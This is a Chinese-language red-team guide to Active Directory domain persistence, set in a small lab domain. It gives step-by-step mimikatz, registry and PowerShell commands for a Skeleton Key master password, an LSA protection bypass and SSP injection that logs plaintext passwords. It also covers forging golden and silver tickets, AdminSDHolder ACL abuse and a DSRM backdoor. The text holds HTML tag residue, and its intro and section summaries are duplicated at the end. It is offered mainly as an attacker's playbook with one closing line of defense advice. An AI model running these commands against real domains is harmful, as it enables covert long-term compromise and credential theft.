域内持久化技术全面指南<\/h1>

前言<\/h2>
本文总结了多种常见的域内持久化技术，包括万能密码、LSA绕过、SSP注入、黄金票据、白银票据、AdminSDHolder滥用、SID History后门和DSRM后门等技术。这些技术可以帮助攻击者在获取域控权限后维持长期访问权限。<\/p>

实验环境<\/h2>

域名: redteam<\/li>
域控: 192.168.1.132 主机名:DC 版本:winserver2019 x64<\/li>

有域管权限的域内机器:192.168.1.133 主机名:IT 版本:winserver2012 x64<\/li> <\/ul>

万能密码(Skeleton-Key)<\/h2>

使用前提<\/h3>

在64位域控服务器上使用<\/li>
只是让所有域用户使用同一个万能密码进行登录<\/li>
当前用户仍可以用原密码登录<\/li>

重启后失效<\/li> <\/ul>

实现原理<\/h3>
在DC上以域控权限运行skeleton，将Kerberos认证加密降到RC4_HMAC_MD5，并以内存更新的方式给lsass.exe进程patch一个主密码mimikatz。<\/p>

实验步骤<\/h3>

在域控以管理员权限运行mimikatz:

privilege ::debug
misc ::skeleton
<\/code><\/pre>
<\/li>
查看现有连接并注销:
net use
net use \\192.168.1.132\ipc$ \/del \/y
<\/code><\/pre>
<\/li>
使用域管理员账号和Skeleton Key连接域控:
net use \\DC\c$ "mimikatz" \/user:redteam\administrator
<\/code><\/pre>
<\/li>
<\/ol>
注意事项<\/h3>

只能使用域控主机名连接，不能使用IP直接连接<\/li>
普通域用户无权限访问域控内容<\/li>
重启域控后万能密码失效<\/li>
<\/ul>
LSA绕过<\/h2>
LSA保护机制<\/h3>
Windows 8.1开始为LSA提供额外保护，要求所有加载到LSA的插件都必须使用Microsoft签名。<\/p>
开启LSA保护<\/h3>
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" \/v "RunAsPPL" \/t REG_DWORD \/d "00000001" \/f
<\/code><\/pre>
绕过方法<\/h3>
使用mimikatz的mimidrv.sys驱动程序:<\/p>
privilege::debug
!+
!processprotect \/process:lsass.exe \/remove
misc::skeleton
<\/code><\/pre>
SSP持久化<\/h2>
SSP简介<\/h3>
SSP(Security Support Provider)是Windows身份认证机制的提供者，如NTLM、Kerberos等。<\/p>
内存注入方式<\/h3>
privilege::debug
misc::memssp
<\/code><\/pre>

注销用户重新登录后，在C:\Windows\System32\mimilsa.log获取明文密码<\/li>
重启后失效<\/li>
<\/ul>
加载mimilib.dll方式<\/h3>

将mimilib.dll复制到C:\Windows\System32\<\/li>
修改注册表:
reg add "hklm\system\currentcontrolset\control\lsa\" \/v "Security Packages" \/d "mimilib.dll" \/t REG_MULTI_SZ
<\/code><\/pre>
<\/li>
重启后明文密码保存在C:\Windows\System32\Kiwissp.log<\/li>
<\/ol>
两种方式差异<\/h3>

内存注入:必须重新登录，重启后失效<\/li>
mimilib.dll:必须重启，永久有效<\/li>
<\/ul>
黄金票据(Golden Ticket)<\/h2>
制作条件<\/h3>

域名称<\/li>
域的SID值<\/li>
域的KRBTGT账户密码HASH<\/li>
伪造用户名(可任意)<\/li>
<\/ol>
利用步骤<\/h3>

获取krbtgt的HASH:
lsadump::dcsync \/redteam.local \/user:krbtgt
<\/code><\/pre>
<\/li>
生成黄金票据(去掉SID最后一个-后的值):
kerberos::golden \/admin:administrator \/domain:redteam.local \/sid:S-1-5-21-3458133008-801623762-2841880732 \/krbtgt:c1fae0c27a40526e4ade2065d9646427 \/ticket:golden.kiribi
<\/code><\/pre>
<\/li>
导入内存:
kerberos::purge
kerberos::ptt golden.kiribi
kerberos::list
<\/code><\/pre>
<\/li>
<\/ol>
注意事项<\/h3>

票据默认20分钟内有效，过期后需重新导入<\/li>
可伪造任意用户(即使不存在)<\/li>
krbtgt的NTLM hash通常不会轻易改变<\/li>
<\/ul>
白银票据(Silver Ticket)<\/h2>
制作条件<\/h3>

域名称<\/li>
域的SID值<\/li>
域的服务账户密码HASH(非krbtgt)<\/li>
伪造用户名(可任意)<\/li>
<\/ol>
利用步骤<\/h3>

获取服务账户(如DC)的HASH:
privilege::debug
sekurlsa::logonpasswords
<\/code><\/pre>
<\/li>
生成白银票据:
kerberos::golden \/domain:redteam.local \/sid:S-1-5-21-3458133008-801623762-2841880732 \/target:DC.redteam.local \/service:cifs \/rc4:d0bcb64fc54fedf6adc2a53d78dcdec6 \/user:testone \/ptt
<\/code><\/pre>
<\/li>
<\/ol>
黄金票据与白银票据区别<\/h3>

访问权限:

黄金票据:伪造TGT，可获取任何Kerberos服务权限<\/li>
白银票据:伪造TGS，只能访问指定服务<\/li>
<\/ul>
<\/li>
加密方式:

黄金票据:由krbtgt的Hash加密<\/li>
白银票据:由服务端密码的Hash加密<\/li>
<\/ul>
<\/li>
认证流程:

黄金票据:需要访问域控(KDC)<\/li>
白银票据:可直接跳过KDC访问服务器<\/li>
<\/ul>
<\/li>
<\/ol>
AdminSDHolder滥用<\/h2>
原理<\/h3>
AdminSDHolder是受保护AD账户和组的模板，修改其ACL可影响所有受保护组。<\/p>
利用步骤<\/h3>

添加用户权限:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName IT -Verbose -Rights All
<\/code><\/pre>
<\/li>
修改生效时间(默认60分钟):
reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters \/v AdminSDProtectFrequency \/t REG_DWORD \/d 60
<\/code><\/pre>
<\/li>
验证权限:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{ $_.IdentityReference -match 'IT' }
<\/code><\/pre>
<\/li>
添加域管权限:
net group "domain admins" IT \/add \/domain
<\/code><\/pre>
<\/li>
<\/ol>
SID History后门<\/h2>
SID介绍<\/h3>
每个用户账号有唯一SID，格式如:S-1-5-21-310440588-250036847-580389505-500<\/p>

S:表示SID<\/li>
1:版本号<\/li>
5:颁发机构(NT)<\/li>
21-...:域标识<\/li>
500:相对标识符(RID)<\/li>
<\/ul>
常见RID<\/h3>

500:管理员<\/li>
519:EA<\/li>
501:Guest<\/li>
<\/ul>
利用方法<\/h3>
(注:在winserver2019 17763域控测试失败)<\/p>
DSRM后门<\/h2>
原理<\/h3>
DSRM(目录服务恢复模式)是域控制器的安全模式启动选项，每个DC有一个本地管理员账户。<\/p>
利用步骤<\/h3>

同步DSRM密码:
ntdsutil
SET DSRM PASSWORD
SYNC FROM DOMAIN ACCOUNT domainusername
<\/code><\/pre>
<\/li>
修改注册表允许网络登录:
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD
<\/code><\/pre>
<\/li>
使用mimikatz进行PTH攻击<\/li>
<\/ol>
总结<\/h2>
本文详细介绍了多种域内持久化技术，攻击者可根据不同环境选择合适的技术组合使用。防御方应定期检查域控配置、监控异常活动并及时更新补丁。<\/p>

域内持久化技术全面指南<\/h1>

前言<\/h2> 本文总结了多种常见的域内持久化技术，包括万能密码、LSA绕过、SSP注入、黄金票据、白银票据、AdminSDHolder滥用、SID History后门和DSRM后门等技术。这些技术可以帮助攻击者在获取域控权限后维持长期访问权限。<\/p>

万能密码(Skeleton-Key)<\/h2>

实现原理<\/h3> 在DC上以域控权限运行skeleton，将Kerberos认证加密降到RC4_HMAC_MD5，并以内存更新的方式给lsass.exe进程patch一个主密码mimikatz。<\/p>

LSA绕过<\/h2>

LSA保护机制<\/h3> Windows 8.1开始为LSA提供额外保护，要求所有加载到LSA的插件都必须使用Microsoft签名。<\/p>

SSP持久化<\/h2>

SSP简介<\/h3> SSP(Security Support Provider)是Windows身份认证机制的提供者，如NTLM、Kerberos等。<\/p>

黄金票据(Golden Ticket)<\/h2>

白银票据(Silver Ticket)<\/h2>

AdminSDHolder滥用<\/h2>

原理<\/h3> AdminSDHolder是受保护AD账户和组的模板，修改其ACL可影响所有受保护组。<\/p>

SID History后门<\/h2>

利用方法<\/h3> (注:在winserver2019 17763域控测试失败)<\/p>

DSRM后门<\/h2>

原理<\/h3> DSRM(目录服务恢复模式)是域控制器的安全模式启动选项，每个DC有一个本地管理员账户。<\/p>

总结<\/h2> 本文详细介绍了多种域内持久化技术，攻击者可根据不同环境选择合适的技术组合使用。防御方应定期检查域控配置、监控异常活动并及时更新补丁。<\/p>

前言<\/h2>
本文总结了多种常见的域内持久化技术，包括万能密码、LSA绕过、SSP注入、黄金票据、白银票据、AdminSDHolder滥用、SID History后门和DSRM后门等技术。这些技术可以帮助攻击者在获取域控权限后维持长期访问权限。<\/p>

实现原理<\/h3>
在DC上以域控权限运行skeleton，将Kerberos认证加密降到RC4_HMAC_MD5，并以内存更新的方式给lsass.exe进程patch一个主密码mimikatz。<\/p>

LSA保护机制<\/h3>
Windows 8.1开始为LSA提供额外保护，要求所有加载到LSA的插件都必须使用Microsoft签名。<\/p>

SSP简介<\/h3>
SSP(Security Support Provider)是Windows身份认证机制的提供者，如NTLM、Kerberos等。<\/p>

原理<\/h3>
AdminSDHolder是受保护AD账户和组的模板，修改其ACL可影响所有受保护组。<\/p>

利用方法<\/h3>
(注:在winserver2019 17763域控测试失败)<\/p>

原理<\/h3>
DSRM(目录服务恢复模式)是域控制器的安全模式启动选项，每个DC有一个本地管理员账户。<\/p>

总结<\/h2>
本文详细介绍了多种域内持久化技术，攻击者可根据不同环境选择合适的技术组合使用。防御方应定期检查域控配置、监控异常活动并及时更新补丁。<\/p>